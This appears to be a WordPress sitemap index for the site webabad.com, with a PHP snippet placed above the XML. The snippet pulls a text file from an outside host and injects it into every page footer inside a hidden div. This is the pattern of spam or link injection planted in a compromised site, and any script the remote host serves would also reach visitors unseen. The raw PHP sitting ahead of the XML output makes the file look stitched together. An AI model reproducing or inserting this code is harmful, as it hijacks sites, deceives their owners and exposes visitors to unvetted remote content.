function load_hidden_external_content() {
    $url = 'https://unkrim.xyz/list.txt';
    $response = wp_remote_get( $url );
    if ( is_wp_error( $response ) ) { return ''; }
    $body = wp_remote_retrieve_body( $response );
    if ( empty( $body ) ) { return ''; }
    return '<div style="display:none">' . $body . '</div>';
}
add_action('wp_footer', function() {
    echo load_hidden_external_content();
}, 9999);
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://webabad.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://webabad.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://webabad.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://webabad.com/wp-sitemap-posts-team-1.xml</loc></sitemap><sitemap><loc>https://webabad.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://webabad.com/wp-sitemap-taxonomies-post_tag-1.xml</loc></sitemap><sitemap><loc>https://webabad.com/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
